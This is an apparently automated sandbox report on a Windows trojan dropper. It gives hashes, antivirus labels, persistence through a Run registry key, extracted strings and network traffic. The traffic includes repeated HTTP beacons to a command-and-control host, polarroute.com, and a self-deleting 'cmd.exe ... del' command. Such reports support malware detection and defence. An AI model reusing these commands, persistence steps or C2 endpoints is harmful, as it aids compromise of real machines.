Analysis Date2015-10-14 01:56:12
MD5eb9a0641a2802d01b8f40442980c542a
SHA1d1770d569b5eebd411328f55d5ffd02bafb93880

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: fe8058e4006fca7424c964cccc1e0237 sha1: 6a90136fb23058090fc0ffd82a69e9bae3bed020 size: 56320
Section.rdata md5: 9c9b446a02daa6409c23262139d48cb7 sha1: f300ed7e2b5e7456aaf2f227122fe4346407e8c0 size: 10240
Section.data md5: 0e85cb31de1e91487f1efeeb96798d88 sha1: 0e272e318acf08ee509b8bddfec94e70e4fe7183 size: 6656
Section.rsrc md5: 61fb2ab043e33ec214eefc8d3e2a5f91 sha1: 8bd2b04e0bda2ce7cd36a8ef3af990012593a364 size: 11776
Section.reloc md5: 43262591e2c5d8372516fe6d9bdbb368 sha1: 175d00bd8ec4101a80b7e1d790d542f7be36c6c7 size: 5120
Timestamp2013-02-05 04:03:07
PackerMicrosoft Visual C++ ?.?
PEhash002471867be2a3235a3368c638e8b117ca084b94
IMPhash4511896d043677e4ab4578dc5bcab5a0
AVCA (E-Trust Ino)no_virus
AVRisingError Scanning File
AVMcafeeTrojan-FDXL!EB9A0641A280
AVAvira (antivir)TR/Dropper.Gen7
AVTwisterTrojan.F5D4D60C125C8750
AVAd-AwareGen:Trojan.Heur.RP.fuW@aCHU9Xcj
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/Shyape.G
AVGrisoft (avg)Generic32.CQJL
AVSymantecTrojan.Sakurel
AVFortinetW32/Shyape.G!tr
AVBitDefenderGen:Trojan.Heur.RP.fuW@aCHU9Xcj
AVK7Trojan ( 0043a4491 )
AVMicrosoft Security EssentialsTrojan:Win32/Diofopi.F
AVMicroWorld (escan)Gen:Trojan.Heur.RP.fuW@aCHU9Xcj
AVMalwareBytesTrojan.Agent
AVAuthentiumW32/A-1ec329e0!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.Win32.Scar
AVEmsisoftGen:Trojan.Heur.RP.fuW@aCHU9Xcj
AVZillya!Trojan.Scar.Win32.79088
AVKasperskyTrojan.Win32.Scar.hmoa
AVTrend MicroBKDR_DIOFOPI.SM
AVCAT (quickheal)Trojan.Diofopi.MUE.E5
AVVirusBlokAda (vba32)Trojan.Scar
AVPadvishno_virus
AVBullGuardGen:Trojan.Heur.RP.fuW@aCHU9Xcj
AVArcabit (arcavir)Gen:Trojan.Heur.RP.fuW@aCHU9Xcj
AVClamAVno_virus
AVDr. WebTrojan.DownLoad3.22515
AVF-SecureGen:Trojan.Heur.RP.fuW@aCHU9Xcj

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicroMedia ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\MicroMedia\MediaCenter.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\MicroMedia\MediaCenter.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\MicroMedia\MediaCenter.exe
Creates Processcmd.exe /c ping 127.0.0.1 & del /q C:\malware.exe

Process
↳ cmd.exe /c ping 127.0.0.1 & del /q C:\malware.exe

Creates Processping 127.0.0.1

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\MicroMedia\MediaCenter.exe

Winsock URLhttp://www.polarroute.com/viewphoto.asp?resid=169578&photoid=abegujvatqzfzxq-1067872246
Winsock URLhttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=107406
Winsock URLhttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=138484
Winsock URLhttp://www.polarroute.com/viewphoto.asp?resid=76343&photoid=abegujvatqzfzxq-1067872246
Winsock URLhttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=76296
Winsock URLhttp://www.polarroute.com/viewphoto.asp?resid=107421&photoid=abegujvatqzfzxq-1067872246
Winsock URLhttp://www.polarroute.com/viewphoto.asp?resid=200656&photoid=abegujvatqzfzxq-1067872246
Winsock URLhttp://www.polarroute.com/viewphoto.asp?resid=138500&photoid=abegujvatqzfzxq-1067872246
Winsock URLhttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=200640
Winsock URLhttp://www.polarroute.com/viewphoto.asp?resid=231734&photoid=abegujvatqzfzxq-1067872246
Winsock URLhttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=231718
Winsock URLhttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=169562

Process
↳ ping 127.0.0.1

Winsock DNS127.0.0.1

Network Details:

DNSpolarroute.com
Type: A
184.168.221.36
DNSwww.polarroute.com
Type: A
HTTP POSThttp://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=75812
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=76296
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/viewphoto.asp?resid=76343&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
HTTP POSThttp://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=107375
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=107406
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/viewphoto.asp?resid=107421&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
HTTP POSThttp://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=138453
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=138484
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/viewphoto.asp?resid=138500&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
HTTP POSThttp://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=169531
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=169562
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/viewphoto.asp?resid=169578&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
HTTP POSThttp://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=200609
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=200640
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/viewphoto.asp?resid=200656&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
HTTP POSThttp://www.polarroute.com/newimage.asp?imageid=abegujvatqzfzxq-1067872246&type=0&resid=231687
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/photo/abegujvatqzfzxq-1067872246.jpg?resid=231718
User-Agent: iexplorer
HTTP GEThttp://www.polarroute.com/viewphoto.asp?resid=231734&photoid=abegujvatqzfzxq-1067872246
User-Agent: iexplorer
Flows TCP192.168.1.1:1031 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1032 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1033 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1034 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1035 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1036 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1037 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1038 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1039 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1040 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1041 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1042 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1043 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1044 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1045 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1046 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1047 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1048 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1049 ➝ 184.168.221.36:80

Raw Pcap

Strings
00-+ CC
.
\
 
.
__
A(null)
eaHAREPMKJ
e@IMJMWPVEPKV
gv}tpfewa
                                 H
         (((((                  H
         h((((                  H
@jjj
jjjj
KERNEL32.DLL
mscoree.dll
xsMJ@KSWxw]WPAI
xSMJ@KSWxW]WPAI
xW]WTVAT
xW]WTVATx
xW]WTVATxW]WTVAT
                          
;-<@<[<
0,020U0\0u0
0/040L0R0a0g0v0|0
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0 2O2t2W4S6W6[6_6c6g6k6o6|6
030:0@0N0U0Z0c0p0v0
=0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
090?0q0
0A@@Ju
0&cAPiK@QHAbMHAjEIAe
0SSSSS
0WWWWW
1?1X1_1g1l1p1t1
1$2/2M2W2a2s2
141E1P1x1
1&cAPiK@QHAbMHAjEIAs
<%<1<h<q<}<
; ;(;1;:;S;h;
1!sMJa\AG
2$2,242<2D2h3l3p3t3x3|3
2!2K2w2
242]2b2y2
2#444n4{4
2N2T2X2\2`2
3!3K3}3
3#4-4>4U4a4g4q4
38"3$x3.3
3H4\4}4
3Z3`3l3
4(5F5X5v5
:4:I:o:
< ?.?4?N?S?b?k?x?
4rswuvN
4V5\5a5g5n5
5 6-8?8Q8s8
6$61666<6E6N6V6a6f6k6p6z6
6 6(616:6C6N6S6[6j6
6%6:6z6
6"6t6z6
6[7a7z7
6/7H7O7W7\7`7d7
6`7j7w7
6h6m6w6
:):6:=:H:b:
6P7V7\7b7h7n7u7|7
70858:8?8O8~8
?;713?2
7"7'7,777<7D7J7S7X7_7e7
7-7?7E7J7k7
7(7H7h7
7>8D8H8L8P8
83!?;713x7%&
8$8(80848P8\8x8
8!8'8=8D8N9U9
8/8c8i8t8
8)8E8N8T8]8b8q8
8>8H8`8
8:8V8|8
8)919\9e9m9z9
8A8S8a8v8
8;:A:P:]:f:
<8<C<y<
?8?]?p?
8VVVVV
>983/!3::
98:Y:e:
9+929J9V9\9h9w9}9
9%9`9|9
9"9)9.959:9
9 9<9@9`9
9;9m9t9x9|9
9B9k9q9
9B:Q:`:i:~:
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
AllocateAndInitializeSid
>%a\MPtVKGAWW
=a=m=y>^?t?
An application has made an attempt to load the C runtime library incorrectly.
;a<*=[=q=
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<at9<rt,<wt
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
<&<;<B<H<^<y<
;+;b;s;
@%bVAAhMFVEV]eJ@a\MPpLVAE@
Child ProcessId is %d
cK`ARpKKH
cKhMJO
CloseHandle
cmd.exe
cmd.exe /c 
cmd.exe /c rundll32 "%s" 
CONOUT$
CorExitProcess
/c ping 127.0.0.1 & del /q "%s"
Create Child Cmd.exe Process Succeed!
CreateDirectoryA
CreateFileA
CreatePipe
CreateProcessA
- CRT not initialized
C:\windows\system32\cmd.exe
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
%d_of_%d_for_%s_on_%s
DOMAIN error
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
<(=E=L=
EncodePointer
EnterCriticalSection
EqualSid
ExitProcess
ExpandEnvironmentStringsA
February
>F>^>i>
FindClose
FindFirstFileA
FindResourceA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeSid
Friday
GetACP
GetActiveWindow
GetCommandLineA
GetComputerNameA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileSize
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemDirectoryA
GetSystemTimeAsFileTime
GetTempPathA
GetTickCount
GetTokenInformation
GetUserNameA
GetUserObjectInformationA
GetVersionExA
GetVolumeInformationA
gKcAPkFNAGP
gKmJMPMEHM^A
:':g:y:
`h````
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
:(:H:h:
`h`hhh
HH:mm:ss
;(;H;h;t;
HHtXHHt
=$=H=k=
http://
HTTP/1.1
HttpOpenRequestA
HttpSendRequestA
 IAIWAP
 IEHHKG
iexplorer
>If90t
>">:>@>I>`>h>v>
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetReadFile
IsDebuggerPresent
IsValidCodePage
IWRGVP
JanFebMarAprMayJunJulAugSepOctNovDec
January
j@j ^V
=)=?=J=O=Z=_=j=o=|=
.jpg?resid=%d
j"^SSSSS
:J;U;_;p;{;.=?=G=M=R=X=
?=?J?V?^?f?r?
KERNEL32.dll
LCMapStringA
LCMapStringW
L$DQUUUj
LeaveCriticalSection
LoadLibraryA
LoadResource
LockResource
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
?;?M?t?
MultiByteToWideChar
mWqWAVeJe@IMJ
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
(null)
oavjah
October
OpenProcess
OpenProcessToken
;&<O<u<{<
PeekNamedPipe
PlayWin32
Playx64
Please contact the application's support team for more information.
PPPPPPPP
Program: 
Program Files (x86)
<program name unknown>
- pure virtual function call
PUVh`EA
<&<p<w<
qeg`HH
QueryPerformanceCounter
QVVVVVVh 
>&>;>R>[>b>h>}>
`.rdata
ReadFile
RegCloseKey
RegDeleteKeyA
RegOpenKeyA
RegSetValueExA
@.reloc
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
      <requestedPrivileges>
?resid=%d&photoid=
rss.tmp
rswuvp
RtlUnwind
runtime error 
Runtime Error!
Saturday
    </security>
    <security>
Self Process Id:%d
September
SetEndOfFile
SetFilePointer
SetHandleCount
SetLastError
SetPriorityClass
SetStdHandle
SetThreadPriority
SetUnhandledExceptionFilter
SHChangeNotify
SHELL32.dll
ShellExecuteA
SING error
SizeofResource
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
^SSSSS
=%s&type=%d&resid=%d
Sunday
SunMonTueWedThuFriSat
teh<[@
TerminateProcess
tGHt.Ht&
tHE]sMJ
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
t h`YA
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
t"SS9]
t$<"u	3
Tuesday
;t$,v-
tVKCVEI
t+WWVPV
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UNICODE
UQPXY]Y[
URPQQh
USER32.DLL
UTF-16LE
UUUWUU
:':v:|:
VirtualAlloc
VirtualFree
v	N+D$
Wednesday
 wHAAT
WideCharToMultiByte
WinExec
WININET.dll
%wLAHHa\AGQPAa\s
wlgVAEPAmPAIbVKItEVWMJCjEIA
WriteConsoleA
WriteConsoleW
WriteFile
/!WTVMJPB
^WWWWW
!!!x89$">&9:3$9#"3x59;
!!!x&9:7$$9#"3x59;
xppwpp
xpxxxx
y ?3!&>9"9x7%&
y&>9"9y
>=Yt1j
<,<?<z<